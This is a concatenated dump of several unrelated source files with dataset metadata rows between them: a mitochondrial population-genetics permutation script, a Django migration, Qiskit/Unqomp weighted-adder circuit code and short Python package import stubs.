'GGG': 'G', 'TGA': '*', 'GGA': 'G', 'TGG': 'W', 'GGC': 'G', 'TAC': 'Y', 'TTC': 'F', 'TCG': 'S', 'TTA': 'L', 'TTG': 'L', 'TCC': 'S', 'ACC': 'T', 'TAA': '*', 'GCA': 'A', 'GTA': 'V', 'GCC': 'A', 'GTC': 'V', 'GCG': 'A', 'GTG': 'V', 'GAG': 'E', 'GTT': 'V', 'GCT': 'A', 'GAC': 'D', 'CGT': 'R', 'GAA': 'E', 'TCA': 'S', 'ATG': 'M', 'CGC': 'R'},'yeastNuc':{'CTT': 'L', 'TAG': '*', 'ACA': 'T', 'ACG': 'T', 'ATC': 'I', 'AAC': 'N', 'ATA': 'I', 'AGG': 'R', 'CCT': 'P', 'ACT': 'T', 'AGC': 'S', 'AAG': 'K', 'AGA': 'R', 'CAT': 'H', 'AAT': 'N', 'ATT': 'I', 'CTG': 'S', 'CTA': 'L', 'CTC': 'L', 'CAC': 'H', 'AAA': 'K', 'CCG': 'P', 'AGT': 'S', 'CCA': 'P', 'CAA': 'Q', 'CCC': 'P', 'TAT': 'Y', 'GGT': 'G', 'TGT': 'C', 'CGA': 'R', 'CAG': 'Q', 'TCT': 'S', 'GAT': 'D', 'CGG': 'R', 'TTT': 'F', 'TGC': 'C', 'GGG': 'G', 'TGA': '*', 'GGA': 'G', 'TGG': 'W', 'GGC': 'G', 'TAC': 'Y', 'TTC': 'F', 'TCG': 'S', 'TTA': 'L', 'TTG': 'L', 'TCC': 'S', 'ACC': 'T', 'TAA': '*', 'GCA': 'A', 'GTA': 'V', 'GCC': 'A', 'GTC': 'V', 'GCG': 'A', 'GTG': 'V', 'GAG': 'E', 'GTT': 'V', 'GCT': 'A', 'GAC': 'D', 'CGT': 'R', 'GAA': 'E', 'TCA': 'S', 'ATG': 'M', 'CGC': 'R'}, 'ascidianMt':{'CTT': 'L', 'TAG': '*', 'ACA': 'T', 'ACG': 'T', 'ATC': 'I', 'AAC': 'N', 'ATA': 'M', 'AGG': 'G', 'CCT': 'P', 'ACT': 'T', 'AGC': 'S', 'AAG': 'K', 'AGA': 'G', 'CAT': 'H', 'AAT': 'N', 'ATT': 'I', 'CTG': 'L', 'CTA': 'L', 'CTC': 'L', 'CAC': 'H', 'AAA': 'K', 'CCG': 'P', 'AGT': 'S', 'CCA': 'P', 'CAA': 'Q', 'CCC': 'P', 'TAT': 'Y', 'GGT': 'G', 'TGT': 'C', 'CGA': 'R', 'CAG': 'Q', 'TCT': 'S', 'GAT': 'D', 'CGG': 'R', 'TTT': 'F', 'TGC': 'C', 'GGG': 'G', 'TGA': 'W', 'GGA': 'G', 'TGG': 'W', 'GGC': 'G', 'TAC': 'Y', 'TTC': 'F', 'TCG': 'S', 'TTA': 'L', 'TTG': 'L', 'TCC': 'S', 'ACC': 'T', 'TAA': '*', 'GCA': 'A', 'GTA': 'V', 'GCC': 'A', 'GTC': 'V', 'GCG': 'A', 'GTG': 'V', 'GAG': 'E', 'GTT': 'V', 'GCT': 'A', 'GAC': 'D', 'CGT': 'R', 'GAA': 'E', 'TCA': 'S', 'ATG': 'M', 'CGC': 'R'},'flatwormMt':{'CTT': 'L', 'TAG': '*', 'ACA': 'T', 'ACG': 'T', 'ATC': 'I', 'AAC': 'N', 'ATA': 'I', 'AGG': 'S', 'CCT': 'P', 'ACT': 'T', 'AGC': 'S', 'AAG': 'K', 'AGA': 'S', 'CAT': 'H', 'AAT': 'N', 'ATT': 'I', 'CTG': 'L', 'CTA': 'L', 'CTC': 'L', 'CAC': 'H', 'AAA': 'N', 'CCG': 'P', 'AGT': 'S', 'CCA': 'P', 'CAA': 'Q', 'CCC': 'P', 'TAT': 'Y', 'GGT': 'G', 'TGT': 'C', 'CGA': 'R', 'CAG': 'Q', 'TCT': 'S', 'GAT': 'D', 'CGG': 'R', 'TTT': 'F', 'TGC': 'C', 'GGG': 'G', 'TGA': 'W', 'GGA': 'G', 'TGG': 'W', 'GGC': 'G', 'TAC': 'Y', 'TTC': 'F', 'TCG': 'S', 'TTA': 'L', 'TTG': 'L', 'TCC': 'S', 'ACC': 'T', 'TAA': 'Y', 'GCA': 'A', 'GTA': 'V', 'GCC': 'A', 'GTC': 'V', 'GCG': 'A', 'GTG': 'V', 'GAG': 'E', 'GTT': 'V', 'GCT': 'A', 'GAC': 'D', 'CGT': 'R', 'GAA': 'E', 'TCA': 'S', 'ATG': 'M', 'CGC': 'R'},'chlorophyceanMt':{'CTT': 'L', 'TAG': 'L', 'ACA': 'T', 'ACG': 'T', 'ATC': 'I', 'AAC': 'N', 'ATA': 'I', 'AGG': 'R', 'CCT': 'P', 'ACT': 'T', 'AGC': 'S', 'AAG': 'K', 'AGA': 'R', 'CAT': 'H', 'AAT': 'N', 'ATT': 'I', 'CTG': 'L', 'CTA': 'L', 'CTC': 'L', 'CAC': 'H', 'AAA': 'K', 'CCG': 'P', 'AGT': 'S', 'CCA': 'P', 'CAA': 'Q', 'CCC': 'P', 'TAT': 'Y', 'GGT': 'G', 'TGT': 'C', 'CGA': 'R', 'CAG': 'Q', 'TCT': 'S', 'GAT': 'D', 'CGG': 'R', 'TTT': 'F', 'TGC': 'C', 'GGG': 'G', 'TGA': '*', 'GGA': 'G', 'TGG': 'W', 'GGC': 'G', 'TAC': 'Y', 'TTC': 'F', 'TCG': 'S', 'TTA': 'L', 'TTG': 'L', 'TCC': 'S', 'ACC': 'T', 'TAA': '*', 'GCA': 'A', 'GTA': 'V', 'GCC': 'A', 'GTC': 'V', 'GCG': 'A', 'GTG': 'V', 'GAG': 'E', 'GTT': 'V', 'GCT': 'A', 'GAC': 'D', 'CGT': 'R', 'GAA': 'E', 'TCA': 'S', 'ATG': 'M', 'CGC': 'R'},'trematodeMt':{'CTT': 'L', 'TAG': '*', 'ACA': 'T', 'ACG': 'T', 'ATC': 'I', 'AAC': 'N', 'ATA': 'M', 'AGG': 'S', 'CCT': 'P', 'ACT': 'T', 'AGC': 'S', 'AAG': 'K', 'AGA': 'S', 'CAT': 'H', 'AAT': 'N', 'ATT': 'I', 'CTG': 'L', 'CTA': 'L', 'CTC': 'L', 'CAC': 'H', 'AAA': 'N', 'CCG': 'P', 'AGT': 'S', 'CCA': 'P', 'CAA': 'Q', 'CCC': 'P', 'TAT': 'Y', 'GGT': 'G', 'TGT': 'C', 'CGA': 'R', 'CAG': 'Q', 'TCT': 'S', 'GAT': 'D', 'CGG': 'R', 'TTT': 'F', 'TGC': 'C', 'GGG': 'G', 'TGA': 'W', 'GGA': 'G', 'TGG': 'W', 'GGC': 'G', 'TAC': 'Y', 'TTC': 'F', 'TCG': 'S', 'TTA': 'L', 'TTG': 'L', 'TCC': 'S', 'ACC': 'T', 'TAA': '*', 'GCA': 'A', 'GTA': 'V', 'GCC': 'A', 'GTC': 'V', 'GCG': 'A', 'GTG': 'V', 'GAG': 'E', 'GTT': 'V', 'GCT': 'A', 'GAC': 'D', 'CGT': 'R', 'GAA': 'E', 'TCA': 'S', 'ATG': 'M', 'CGC': 'R'},'pterobranchiaMt':{'CTT': 'L', 'TAG': '*', 'ACA': 'T', 'ACG': 'T', 'ATC': 'I', 'AAC': 'N', 'ATA': 'I', 'AGG': 'K', 'CCT': 'P', 'ACT': 'T', 'AGC': 'S', 'AAG': 'K', 'AGA': 'S', 'CAT': 'H', 'AAT': 'N', 'ATT': 'I', 'CTG': 'L', 'CTA': 'L', 'CTC': 'L', 'CAC': 'H', 'AAA': 'K', 'CCG': 'P', 'AGT': 'S', 'CCA': 'P', 'CAA': 'Q', 'CCC': 'P', 'TAT': 'Y', 'GGT': 'G', 'TGT': 'C', 'CGA': 'R', 'CAG': 'Q', 'TCT': 'S', 'GAT': 'D', 'CGG': 'R', 'TTT': 'F', 'TGC': 'C', 'GGG': 'G', 'TGA': 'W', 'GGA': 'G', 'TGG': 'W', 'GGC': 'G', 'TAC': 'Y', 'TTC': 'F', 'TCG': 'S', 'TTA': 'L', 'TTG': 'L', 'TCC': 'S', 'ACC': 'T', 'TAA': '*', 'GCA': 'A', 'GTA': 'V', 'GCC': 'A', 'GTC': 'V', 'GCG': 'A', 'GTG': 'V', 'GAG': 'E', 'GTT': 'V', 'GCT': 'A', 'GAC': 'D', 'CGT': 'R', 'GAA': 'E', 'TCA': 'S', 'ATG': 'M', 'CGC': 'R'}}
geneticCode = geneticCodes[code]
startCodons = ['ATT','ATC','ATA','ATG','GTG'] #invertebrateMt code
positionDict = {(0,1533):'COI',(1533,2217):'COII',(2217,2373):'ATP8',(2373,3066):'ATP6',(3066,4005):'ND1',(4005,4509):'ND6',(4509,5646):'CYTB',(5646,5940):'ND4L',(5940,7314):'ND4',(7314,9030):'ND5',(9030,9807):'COIII',(9807,10158):'ND3',(10158,11214):'ND2'} #{(start,stop):gene}
seqDict, seqList, codonDict = buildCodonDict(fasta)
popList = []
sexList = []
outList = []
thetaUSDict = {">$Heron2":(3,2598), ">$clone_1":(2,2598), ">$Rotoiti_1_4n":(2,2594.35416672), ">$AC51":(0,2598.33333333), ">$Heron_mitochondrion":(0,2599), ">$Grasmere_6_3n":(0,2599.62500001), ">$Poerua_triploid":(2,2597), ">$Brunner_6_3n":(2,2592.9583334), ">$McGregor":(0,2599), ">$Poerua_72_4n":(0,2605.47916675), ">$Gunn":(4,2597.66666667), ">$Grasmere_1_4n":(1,2628.66666703), ">$clone_7":(0,2592.85416667), ">$DenmarkA":(0,2593.125), ">$Duluth":(0,2591.52083333), ">$Waik_lane4_TCCTGAGC_trimmed_paired_contig_237":(3,2593.79166667), ">$Waik37":(0,2586.58333333), ">$Waik372":(4,2589.25), ">$Tarawera":(0,2586.58333333), ">$Kaniere_triploid":(1,2586.58333333), ">$Waik36":(14,2586.91666667), ">$WalesC":(2,2584.91666667), ">$Brunner_2_4n":(0,2593.60416674), ">$Lady":(9,2598.66666667), ">$Kaniere_1_2n":(9,2598.33333333), ">$Rotoroa_1_2n":(13,2598.58333338), ">$AlexMap":(0,2592.33333333), ">$Alexsex":(0,2592.33333333), ">$Yellow_Contig_56":(0,2592.33333333), ">$Ianthe":(4,2597), ">$Ianthe_lane1_TAAGGCGA_trimmed_paired_contig_309":(4,2595)}
syn = []
logfile = open('mt_nullDistribution_thetaU-S.log','w')
for seq in seqList:
if '$' in seq:
popList.append(seq)
else:
outList.append(seq)
seqNums = range(len(popList))
currPCT = 0
sexN = 8
asexN = 23
sexAn = aN(sexN)
asexAn = aN(asexN)
logfile.write('Calculating population genetic parameters:\n')
logfile.close()
while len(syn) < 10000:
newPCT = int(round(100*len(syn)/10000.0))
if newPCT > currPCT:
logfile = open('mt_nullDistribution_thetaU-S.log','a')
logfile.write('\t' + str(newPCT) + '% complete\n')
logfile.close()
currPCT = newPCT
sexList = []
asexList = []
while len(sexList) < sexN:
currNum = random.choice(seqNums)
if popList[currNum] not in sexList:
sexList.append(popList[currNum])
while len(asexList) < asexN:
currNum = random.choice(seqNums)
if popList[currNum] not in asexList and popList[currNum] not in sexList:
asexList.append(popList[currNum])
asexSS = 0
sexSS = 0
asexSynSites = 0
sexSynSites = 0
for asexual in asexList:
currSynValues = thetaUSDict[asexual]
asexSS += currSynValues[0]
asexSynSites += currSynValues[1]
for sexual in sexList:
currSynValues = thetaUSDict[sexual]
sexSS += currSynValues[0]
sexSynSites += currSynValues[1]
asexThetaUS = float(asexSS)/(asexAn*(float(asexSynSites)/len(asexList)))
sexThetaUS = float(sexSS)/(sexAn*(float(sexSynSites)/len(sexList)))
Dsyn = asexThetaUS - sexThetaUS
syn.append(Dsyn)
logfile = open('mt_nullDistribution_thetaU-S.log','a')
logfile.write('Finished calculating population genetic parameters\nSorting Population Genetic Parameters\n')
logfile.close()
sortedDSyn = sorted(syn)
i = 0
sys.stdout.write('Dsyn\n')
while i < 10000:
sys.stdout.write(str(sortedDSyn[i]) + '\n')
i += 1
#thetaU(sys.argv[1])
| 95.756614
| 41,208
| 0.359461
| 51,331
| 416,254
| 2.830103
| 0.024332
| 0.006388
| 0.022337
| 0.004956
| 0.723512
| 0.709958
| 0.706785
| 0.696927
| 0.678066
| 0.666088
| 0
| 0.081706
| 0.329354
| 416,254
| 4,347
| 41,209
| 95.756614
| 0.438685
| 0.004014
| 0
| 0.731792
| 0
| 0.000925
| 0.159168
| 0.018544
| 0
| 0
| 0
| 0
| 0
| 0
| null | null | 0
| 0.000462
| null | null | 0.000231
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
7cc37527fd6fb36a70bef772d339e0f69b79ded9
| 2,149
|
py
|
Python
|
src/bpp/migrations/0137_auto_20180613_0015.py
|
iplweb/django-bpp
|
85f183a99d8d5027ae4772efac1e4a9f21675849
|
[
"BSD-3-Clause"
] | 1
|
2017-04-27T19:50:02.000Z
|
2017-04-27T19:50:02.000Z
|
src/bpp/migrations/0137_auto_20180613_0015.py
|
mpasternak/django-bpp
|
434338821d5ad1aaee598f6327151aba0af66f5e
|
[
"BSD-3-Clause"
] | 41
|
2019-11-07T00:07:02.000Z
|
2022-02-27T22:09:39.000Z
|
src/bpp/migrations/0137_auto_20180613_0015.py
|
iplweb/bpp
|
f027415cc3faf1ca79082bf7bacd4be35b1a6fdf
|
[
"BSD-3-Clause"
] | null | null | null |
# -*- coding: utf-8 -*-
# Generated by Django 1.11.12 on 2018-06-12 22:15
from __future__ import unicode_literals
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('bpp', '0136_ranking_liczba_cytowan'),
]
operations = [
migrations.AlterField(
model_name='praca_doktorska',
name='liczba_cytowan',
field=models.PositiveIntegerField(blank=True, help_text="Wartość aktualizowana jest automatycznie raz na kilka dni w przypadku \n skonfigurowania dostępu do API WOS AMR (przez obiekt 'Uczelnia'). Możesz również\n czaktualizować tą wartość ręcznie, naciskając przycisk. ", null=True, verbose_name='Liczba cytowań'),
),
migrations.AlterField(
model_name='praca_habilitacyjna',
name='liczba_cytowan',
field=models.PositiveIntegerField(blank=True, help_text="Wartość aktualizowana jest automatycznie raz na kilka dni w przypadku \n skonfigurowania dostępu do API WOS AMR (przez obiekt 'Uczelnia'). Możesz również\n czaktualizować tą wartość ręcznie, naciskając przycisk. ", null=True, verbose_name='Liczba cytowań'),
),
migrations.AlterField(
model_name='wydawnictwo_ciagle',
name='liczba_cytowan',
field=models.PositiveIntegerField(blank=True, help_text="Wartość aktualizowana jest automatycznie raz na kilka dni w przypadku \n skonfigurowania dostępu do API WOS AMR (przez obiekt 'Uczelnia'). Możesz również\n czaktualizować tą wartość ręcznie, naciskając przycisk. ", null=True, verbose_name='Liczba cytowań'),
),
migrations.AlterField(
model_name='wydawnictwo_zwarte',
name='liczba_cytowan',
field=models.PositiveIntegerField(blank=True, help_text="Wartość aktualizowana jest automatycznie raz na kilka dni w przypadku \n skonfigurowania dostępu do API WOS AMR (przez obiekt 'Uczelnia'). Możesz również\n czaktualizować tą wartość ręcznie, naciskając przycisk. ", null=True, verbose_name='Liczba cytowań'),
),
]
| 59.694444
| 340
| 0.693811
| 241
| 2,149
| 6.070539
| 0.315353
| 0.054682
| 0.068353
| 0.079289
| 0.844839
| 0.818182
| 0.818182
| 0.818182
| 0.818182
| 0.818182
| 0
| 0.013142
| 0.221033
| 2,149
| 35
| 341
| 61.4
| 0.860812
| 0.032108
| 0
| 0.571429
| 1
| 0.142857
| 0.537313
| 0.013
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.071429
| 0
| 0.178571
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
7cdb3d555ec1919fdd88d2ca9ff936fb37f1634f
| 13,017
|
py
|
Python
|
unqomp/examples/weightedadder.py
|
eth-sri/Unqomp
|
9d7e885af1ebfdeab7e8059d13149aadeed8a6d6
|
[
"MIT"
] | 2
|
2022-01-26T08:49:00.000Z
|
2022-02-12T08:16:54.000Z
|
unqomp/examples/weightedadder.py
|
eth-sri/Unqomp
|
9d7e885af1ebfdeab7e8059d13149aadeed8a6d6
|
[
"MIT"
] | null | null | null |
unqomp/examples/weightedadder.py
|
eth-sri/Unqomp
|
9d7e885af1ebfdeab7e8059d13149aadeed8a6d6
|
[
"MIT"
] | null | null | null |
# Adapted from https://qiskit.org/documentation/_modules/qiskit/circuit/library/arithmetic/weighted_adder.html#WeightedAdder
from qiskit.circuit import QuantumRegister, QuantumCircuit
import numpy as np
from unqomp.uncomputation import uncomputeAllAncillas
from unqomp.ancillaallocation import AncillaRegister, AncillaCircuit
def makeWeightedAdder(num_state_qubits, weights):
# Straightforward implementation using Unqomp, uses less gate but more qubits
num_sum_qubits = int(np.floor(np.log2(sum(weights))) + 1) if sum(weights) > 0 else 1
# The number of sum qubits in the circuit
num_carry_qubits = num_sum_qubits -1
# The number of carry qubits required to compute the sum.
for i, weight in enumerate(weights):
if not np.isclose(weight, np.round(weight)):
raise ValueError('Non-integer weights are not supported!')
weights[i] = np.round(weight)
num_result_qubits = num_state_qubits + num_sum_qubits
qr_state = QuantumRegister(num_state_qubits, name = 'state')
qr_sum = QuantumRegister(num_sum_qubits, name = 'sum')
circuit = AncillaCircuit(qr_state, qr_sum)
#print(num_state_qubits)
#print(num_sum_qubits)
# loop over state qubits and corresponding weights
for i, weight in enumerate(weights):
# only act if non-trivial weight
if np.isclose(weight, 0):
continue
# get state control qubit
q_state = qr_state[i]
# get bit representation of current weight
weight_binary = '{0:b}'.format(int(weight)).rjust(num_sum_qubits, '0')[::-1]
#print("carry qb" + str(num_carry_qubits))
qr_carry = circuit.new_ancilla_register(num_carry_qubits, name = "anccarryite" + str(i))
# loop over bits of current weight and add them to sum and carry registers
for j, bit in enumerate(weight_binary):
if bit == '1':
if num_sum_qubits == 1:
circuit.cx(q_state, qr_sum[j])
elif j == 0:
# compute (q_sum[0] + 1) into (q_sum[0], q_carry[0])
# - controlled by q_state[i]
circuit.ccx(q_state, qr_sum[j], qr_carry[j])
circuit.cx(q_state, qr_sum[j])
elif j == num_sum_qubits - 1:
# compute (q_sum[j] + q_carry[j-1] + 1) into (q_sum[j])
# - controlled by q_state[i] / last qubit,
# no carry needed by construction
circuit.cx(q_state, qr_sum[j])
circuit.ccx(q_state, qr_carry[j - 1], qr_sum[j])
else:
# compute (q_sum[j] + q_carry[j-1] + 1) into (q_sum[j], q_carry[j])
# - controlled by q_state[i]
circuit.mcx([q_state, qr_sum[j], qr_carry[j - 1]], qr_carry[j], negated_ctrls = [1, 2])
circuit.cx(q_state, qr_carry[j])
circuit.cx(q_state, qr_sum[j])
circuit.ccx(q_state, qr_carry[j - 1], qr_sum[j])
else:
if num_sum_qubits == 1:
pass # nothing to do, since nothing to add
elif j == 0:
pass # nothing to do, since nothing to add
elif j == num_sum_qubits-1:
# compute (q_sum[j] + q_carry[j-1]) into (q_sum[j])
# - controlled by q_state[i] / last qubit,
# no carry needed by construction
circuit.ccx(q_state, qr_carry[j - 1], qr_sum[j])
else:
# compute (q_sum[j] + q_carry[j-1]) into (q_sum[j], q_carry[j])
# - controlled by q_state[i]
circuit.mcx([q_state, qr_sum[j], qr_carry[j - 1]], qr_carry[j])
circuit.ccx(q_state, qr_carry[j - 1], qr_sum[j])
return circuit
def makesQiskitWA(num_state_qubits, weights):
# Qiskit implementation still has a regression bug: weighted adder uses the default 'noancilla' mode instead of basic when asked for it
num_sum_qubits = int(np.floor(np.log2(sum(weights))) + 1) if sum(weights) > 0 else 1
num_result_qubits = num_state_qubits + num_sum_qubits
num_carry_qubits = num_sum_qubits - 1
num_control_qubits = num_sum_qubits > 2
qr_state = QuantumRegister(num_state_qubits, name = 'state')
qr_sum = QuantumRegister(num_sum_qubits, name = 'sum')
qr_carry = QuantumRegister(num_carry_qubits, name = 'carry')
qr_control = QuantumRegister(1, name='ctrl') if num_control_qubits > 0 else []
circ = QuantumCircuit(qr_state, qr_sum, qr_carry)
if num_control_qubits > 0:
circ.add_register(qr_control)
# loop over state qubits and corresponding weights
for i, weight in enumerate(weights):
# only act if non-trivial weight
if np.isclose(weight, 0):
continue
# get state control qubit
q_state = qr_state[i]
# get bit representation of current weight
weight_binary = '{0:b}'.format(int(weight)).rjust(num_sum_qubits, '0')[::-1]
# loop over bits of current weight and add them to sum and carry registers
for j, bit in enumerate(weight_binary):
if bit == '1':
if num_sum_qubits == 1:
circ.cx(q_state, qr_sum[j])
elif j == 0:
# compute (q_sum[0] + 1) into (q_sum[0], q_carry[0])
# - controlled by q_state[i]
circ.ccx(q_state, qr_sum[j], qr_carry[j])
circ.cx(q_state, qr_sum[j])
elif j == num_sum_qubits - 1:
# compute (q_sum[j] + q_carry[j-1] + 1) into (q_sum[j])
# - controlled by q_state[i] / last qubit,
# no carry needed by construction
circ.cx(q_state, qr_sum[j])
circ.ccx(q_state, qr_carry[j - 1], qr_sum[j])
else:
# compute (q_sum[j] + q_carry[j-1] + 1) into (q_sum[j], q_carry[j])
# - controlled by q_state[i]
circ.x(qr_sum[j])
circ.x(qr_carry[j - 1])
circ.mct([q_state, qr_sum[j], qr_carry[j - 1]], qr_carry[j], qr_control, mode='basic')
circ.cx(q_state, qr_carry[j])
circ.x(qr_sum[j])
circ.x(qr_carry[j - 1])
circ.cx(q_state, qr_sum[j])
circ.ccx(q_state, qr_carry[j - 1], qr_sum[j])
else:
if num_sum_qubits == 1:
pass # nothing to do, since nothing to add
elif j == 0:
pass # nothing to do, since nothing to add
elif j == num_sum_qubits-1:
# compute (q_sum[j] + q_carry[j-1]) into (q_sum[j])
# - controlled by q_state[i] / last qubit,
# no carry needed by construction
circ.ccx(q_state, qr_carry[j - 1], qr_sum[j])
else:
# compute (q_sum[j] + q_carry[j-1]) into (q_sum[j], q_carry[j])
# - controlled by q_state[i]
circ.mct([q_state, qr_sum[j], qr_carry[j - 1]], qr_carry[j], qr_control, mode='basic')
circ.ccx(q_state, qr_carry[j - 1], qr_sum[j])
# uncompute carry qubits
for j in reversed(range(len(weight_binary))):
bit = weight_binary[j]
if bit == '1':
if num_sum_qubits == 1:
pass
elif j == 0:
circ.x(qr_sum[j])
circ.ccx(q_state, qr_sum[j], qr_carry[j])
circ.x(qr_sum[j])
elif j == num_sum_qubits - 1:
pass
else:
circ.x(qr_carry[j - 1])
circ.mct([q_state, qr_sum[j], qr_carry[j - 1]], qr_carry[j], qr_control, mode='basic')
circ.cx(q_state, qr_carry[j])
circ.x(qr_carry[j - 1])
else:
if num_sum_qubits == 1:
pass
elif j == 0:
pass
elif j == num_sum_qubits - 1:
pass
else:
# compute (q_sum[j] + q_carry[j-1]) into (q_sum[j], q_carry[j])
# - controlled by q_state[i]
circ.x(qr_sum[j])
circ.mct([q_state, qr_sum[j], qr_carry[j - 1]], qr_carry[j], qr_control, mode='basic')
circ.x(qr_sum[j])
return circ
def makeWeightedAdderWOExtraCtrlsQb(num_state_qubits, weights):
# Implementation using Unqomp but enforcing local uncomputation, uses less qubits, but is not fully modular, ancillas have to be taken care of manually
def neg_mct_gate(negated_ctrls):
#circuit.mcx([q_state, qr_sum[j], qr_carry[j - 1]], qr_carry[j], negated_ctrls = [1, 2])
ctrls = QuantumRegister(3)
anc = QuantumRegister(1)
targ = QuantumRegister(1)
neg_mct = QuantumCircuit(ctrls, anc, targ) #[ctrl0...ctrl3, anc, targ]
for i in negated_ctrls:
neg_mct.x(ctrls[i])
neg_mct.mcx(ctrls, targ, anc, mode='basic')
for i in negated_ctrls:
neg_mct.x(ctrls[i])
return neg_mct.to_gate()
num_sum_qubits = int(np.floor(np.log2(sum(weights))) + 1) if sum(weights) > 0 else 1
# The number of sum qubits in the circuit
num_carry_qubits = num_sum_qubits -1
# The number of carry qubits required to compute the sum.
for i, weight in enumerate(weights):
if not np.isclose(weight, np.round(weight)):
raise ValueError('Non-integer weights are not supported!')
weights[i] = np.round(weight)
num_result_qubits = num_state_qubits + num_sum_qubits
qr_state = QuantumRegister(num_state_qubits, name = 'state')
qr_sum = QuantumRegister(num_sum_qubits, name = 'sum')
qr_ctrl = QuantumRegister(1, name='ctrl')
circuit = AncillaCircuit(qr_state, qr_sum, qr_ctrl)
neg_mct_g = neg_mct_gate([1, 2])
mct_g = neg_mct_gate([])
circuit.addQfreeGate(neg_mct_g)
circuit.addQfreeGate(mct_g)
# loop over state qubits and corresponding weights
for i, weight in enumerate(weights):
# only act if non-trivial weight
if np.isclose(weight, 0):
continue
# get state control qubit
q_state = qr_state[i]
# get bit representation of current weight
weight_binary = '{0:b}'.format(int(weight)).rjust(num_sum_qubits, '0')[::-1]
#print("carry qb" + str(num_carry_qubits))
qr_carry = circuit.new_ancilla_register(num_carry_qubits, name = "anccarryite" + str(i))
# loop over bits of current weight and add them to sum and carry registers
for j, bit in enumerate(weight_binary):
if bit == '1':
if num_sum_qubits == 1:
circuit.cx(q_state, qr_sum[j])
elif j == 0:
# compute (q_sum[0] + 1) into (q_sum[0], q_carry[0])
# - controlled by q_state[i]
circuit.ccx(q_state, qr_sum[j], qr_carry[j])
circuit.cx(q_state, qr_sum[j])
elif j == num_sum_qubits - 1:
# compute (q_sum[j] + q_carry[j-1] + 1) into (q_sum[j])
# - controlled by q_state[i] / last qubit,
# no carry needed by construction
circuit.cx(q_state, qr_sum[j])
circuit.ccx(q_state, qr_carry[j - 1], qr_sum[j])
else:
# compute (q_sum[j] + q_carry[j-1] + 1) into (q_sum[j], q_carry[j])
# - controlled by q_state[i]
circuit.append(neg_mct_g, [q_state, qr_sum[j], qr_carry[j-1], qr_ctrl, qr_carry[j]])
circuit.cx(q_state, qr_carry[j])
circuit.cx(q_state, qr_sum[j])
circuit.ccx(q_state, qr_carry[j - 1], qr_sum[j])
else:
if num_sum_qubits == 1:
pass # nothing to do, since nothing to add
elif j == 0:
pass # nothing to do, since nothing to add
elif j == num_sum_qubits-1:
# compute (q_sum[j] + q_carry[j-1]) into (q_sum[j])
# - controlled by q_state[i] / last qubit,
# no carry needed by construction
circuit.ccx(q_state, qr_carry[j - 1], qr_sum[j])
else:
# compute (q_sum[j] + q_carry[j-1]) into (q_sum[j], q_carry[j])
# - controlled by q_state[i]
circuit.append(mct_g, [q_state, qr_sum[j], qr_carry[j-1], qr_ctrl, qr_carry[j]])
circuit.ccx(q_state, qr_carry[j - 1], qr_sum[j])
return circuit
| 47.163043
| 155
| 0.546362
| 1,808
| 13,017
| 3.721239
| 0.091261
| 0.041023
| 0.052319
| 0.040874
| 0.812426
| 0.799197
| 0.788644
| 0.782996
| 0.776605
| 0.758918
| 0
| 0.014904
| 0.345394
| 13,017
| 275
| 156
| 47.334545
| 0.774674
| 0.263041
| 0
| 0.811111
| 0
| 0
| 0.019124
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.022222
| false
| 0.061111
| 0.022222
| 0
| 0.066667
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
|
0
| 8
|
7ce4f223c43db53ccd3c978550cb7d82409e2885
| 73
|
py
|
Python
|
reactivepy/__init__.py
|
dldx/reactivepy
|
d96ed3fd163647088c2d0fc35e930b7946ecb7c5
|
[
"BSD-3-Clause"
] | 73
|
2018-08-17T23:27:57.000Z
|
2022-02-11T19:55:51.000Z
|
reactivepy/__init__.py
|
dldx/reactivepy
|
d96ed3fd163647088c2d0fc35e930b7946ecb7c5
|
[
"BSD-3-Clause"
] | 18
|
2018-08-27T09:12:07.000Z
|
2021-09-02T08:43:00.000Z
|
reactivepy/__init__.py
|
dldx/reactivepy
|
d96ed3fd163647088c2d0fc35e930b7946ecb7c5
|
[
"BSD-3-Clause"
] | 7
|
2018-08-17T23:27:50.000Z
|
2021-04-17T16:03:09.000Z
|
from .kernel import ReactivePythonKernel
from .kernel import __version__
| 24.333333
| 40
| 0.863014
| 8
| 73
| 7.375
| 0.625
| 0.338983
| 0.542373
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.109589
| 73
| 2
| 41
| 36.5
| 0.907692
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
6b00c9bee88cf06a425fb738bf834bc44ad6d464
| 124
|
py
|
Python
|
src/sage/rings/polynomial/weil/all.py
|
LaisRast/sage
|
5fb2a6ea44400e469caee82748cf863ca0c5f724
|
[
"BSL-1.0"
] | null | null | null |
src/sage/rings/polynomial/weil/all.py
|
LaisRast/sage
|
5fb2a6ea44400e469caee82748cf863ca0c5f724
|
[
"BSL-1.0"
] | null | null | null |
src/sage/rings/polynomial/weil/all.py
|
LaisRast/sage
|
5fb2a6ea44400e469caee82748cf863ca0c5f724
|
[
"BSL-1.0"
] | null | null | null |
from sage.misc.lazy_import import lazy_import
